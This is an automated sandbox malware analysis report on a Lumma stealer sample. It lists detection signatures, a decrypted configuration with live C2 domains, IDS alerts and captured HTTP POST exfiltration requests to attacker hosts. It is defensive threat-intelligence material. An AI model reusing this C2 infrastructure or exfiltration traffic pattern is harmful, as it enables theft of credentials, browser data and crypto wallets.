Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ardware-v1.exe

Overview

General Information

Sample name:ardware-v1.exe
Analysis ID:1577233
MD5:c491ddba2ee7516cfc5d5b57ece509a2
SHA1:c0d068660dd74e890bf653a5c839e32314f6bca3
SHA256:1a0b974102462f42d51ae78898fa59bcb9e399c9c3207d26ce0a503a1262f1e6
Tags:exeuser-smica83
Infos:

Detection

LummaC
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • ardware-v1.exe (PID: 1972 cmdline: "C:\Users\user\Desktop\ardware-v1.exe" MD5: C491DDBA2EE7516CFC5D5B57ECE509A2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["immureprech.biz", "debonairnukk.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "effecterectz.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "spend-shiny.cyou", "sordid-snaked.cyou"], "Build id": "tfL8re--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: ardware-v1.exe PID: 1972JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 2 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:27.405887+010020283713Unknown Traffic192.168.2.54985845.77.249.79443TCP
                2024-12-18T09:52:31.002104+010020283713Unknown Traffic192.168.2.549869104.131.68.180443TCP
                2024-12-18T09:52:34.686184+010020283713Unknown Traffic192.168.2.54987923.55.153.106443TCP
                2024-12-18T09:52:37.376405+010020283713Unknown Traffic192.168.2.549886172.67.157.254443TCP
                2024-12-18T09:52:39.453862+010020283713Unknown Traffic192.168.2.549892172.67.157.254443TCP
                2024-12-18T09:52:42.080645+010020283713Unknown Traffic192.168.2.549899172.67.157.254443TCP
                2024-12-18T09:52:44.116781+010020283713Unknown Traffic192.168.2.549905172.67.157.254443TCP
                2024-12-18T09:52:48.083642+010020283713Unknown Traffic192.168.2.549915172.67.157.254443TCP
                2024-12-18T09:52:51.363600+010020283713Unknown Traffic192.168.2.549922172.67.157.254443TCP
                2024-12-18T09:52:54.488685+010020283713Unknown Traffic192.168.2.549932172.67.157.254443TCP
                2024-12-18T09:52:59.111699+010020283713Unknown Traffic192.168.2.549943172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:28.314598+010020546531A Network Trojan was detected192.168.2.54985845.77.249.79443TCP
                2024-12-18T09:52:31.418623+010020546531A Network Trojan was detected192.168.2.549869104.131.68.180443TCP
                2024-12-18T09:52:38.082760+010020546531A Network Trojan was detected192.168.2.549886172.67.157.254443TCP
                2024-12-18T09:52:40.496208+010020546531A Network Trojan was detected192.168.2.549892172.67.157.254443TCP
                2024-12-18T09:52:59.855849+010020546531A Network Trojan was detected192.168.2.549943172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:28.314598+010020498361A Network Trojan was detected192.168.2.54985845.77.249.79443TCP
                2024-12-18T09:52:31.418623+010020498361A Network Trojan was detected192.168.2.549869104.131.68.180443TCP
                2024-12-18T09:52:38.082760+010020498361A Network Trojan was detected192.168.2.549886172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:40.496208+010020498121A Network Trojan was detected192.168.2.549892172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:31.002104+010020582151Domain Observed Used for C2 Detected192.168.2.549869104.131.68.180443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:27.405887+010020582231Domain Observed Used for C2 Detected192.168.2.54985845.77.249.79443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:32.607672+010020582101Domain Observed Used for C2 Detected192.168.2.5550311.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:28.318715+010020582141Domain Observed Used for C2 Detected192.168.2.5613771.1.1.153UDP
                2024-12-18T09:52:29.304741+010020582141Domain Observed Used for C2 Detected192.168.2.5613771.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:31.982468+010020582161Domain Observed Used for C2 Detected192.168.2.5510441.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:31.751951+010020582181Domain Observed Used for C2 Detected192.168.2.5499241.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:31.439534+010020582201Domain Observed Used for C2 Detected192.168.2.5542851.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:24.101138+010020582221Domain Observed Used for C2 Detected192.168.2.5515141.1.1.153UDP
                2024-12-18T09:52:25.103064+010020582221Domain Observed Used for C2 Detected192.168.2.5515141.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:32.832362+010020582261Domain Observed Used for C2 Detected192.168.2.5612351.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:32.204519+010020582361Domain Observed Used for C2 Detected192.168.2.5568421.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:42.809344+010020480941Malware Command and Control Activity Detected192.168.2.549899172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:27.407240+010028225211Domain Observed Used for C2 Detected45.77.249.79443192.168.2.549858TCP
                2024-12-18T09:52:31.004078+010028225211Domain Observed Used for C2 Detected104.131.68.180443192.168.2.549869TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:54.496050+010028438641A Network Trojan was detected192.168.2.549932172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T09:52:35.623619+010028586661Domain Observed Used for C2 Detected192.168.2.54987923.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://awake-weaves.cyou/apiiAvira URL Cloud: Label: malware
                Source: https://deafeninggeh.biz/PKAvira URL Cloud: Label: malware
                Source: https://wrathful-jammy.cyou/DI;Avira URL Cloud: Label: malware
                Source: spend-shiny.cyouAvira URL Cloud: Label: malware
                Source: https://sordid-snaked.cyou/sAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["immureprech.biz", "debonairnukk.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "effecterectz.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "spend-shiny.cyou", "sordid-snaked.cyou"], "Build id": "tfL8re--"}
                Multi AV Scanner detection for submitted file
                Source: ardware-v1.exeVirustotal: Detection: 15%Perma Link
                Source: ardware-v1.exeReversingLabs: Detection: 23%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.8% probability
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: spend-shiny.cyou
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmpString decryptor: tfL8re--
                Source: ardware-v1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ardware-v1.exeStatic PE information: certificate valid
                Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49858 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49869 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49879 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49886 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49899 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49905 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49915 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49922 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49932 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49943 version: TLS 1.2
                Source: ardware-v1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Admin\Workspace\1191982842\Project\Release\Project.pdb source: ardware-v1.exe
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.5:51514 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.5:61377 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.5:55031 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.5:56842 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.5:61235 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.5:54285 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.5:49869 -> 104.131.68.180:443
                Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.5:51044 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 104.131.68.180:443 -> 192.168.2.5:49869
                Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.5:49924 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.5:49858 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.5:49858
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49858 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49858 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49869 -> 104.131.68.180:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49869 -> 104.131.68.180:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49879 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49886 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49886 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49892 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49892 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49899 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49932 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49943 -> 172.67.157.254:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: immureprech.biz
                Source: Malware configuration extractorURLs: debonairnukk.xyz
                Source: Malware configuration extractorURLs: diffuculttan.xyz
                Source: Malware configuration extractorURLs: deafeninggeh.biz
                Source: Malware configuration extractorURLs: effecterectz.xyz
                Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                Source: Malware configuration extractorURLs: awake-weaves.cyou
                Source: Malware configuration extractorURLs: spend-shiny.cyou
                Source: Malware configuration extractorURLs: sordid-snaked.cyou
                Performs DNS queries to domains with low reputation
                Source: DNS query: effecterectz.xyz
                Source: DNS query: diffuculttan.xyz
                Source: DNS query: debonairnukk.xyz
                Source: Joe Sandbox ViewIP Address: 45.77.249.79 45.77.249.79
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewIP Address: 104.131.68.180 104.131.68.180
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49869 -> 104.131.68.180:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49886 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49915 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49922 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49879 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49892 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49943 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49899 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49932 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49858 -> 45.77.249.79:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49905 -> 172.67.157.254:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3P6WUUG987FHXTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12806Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H35EOF1EQDXQIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15042Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9LGACG00F8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20514Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DPBZA0XI7BIZVZ5YUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1232Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BMHH2DI7CB9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 555019Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: spend-shiny.cyou
                Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: ardware-v1.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
                Source: ardware-v1.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
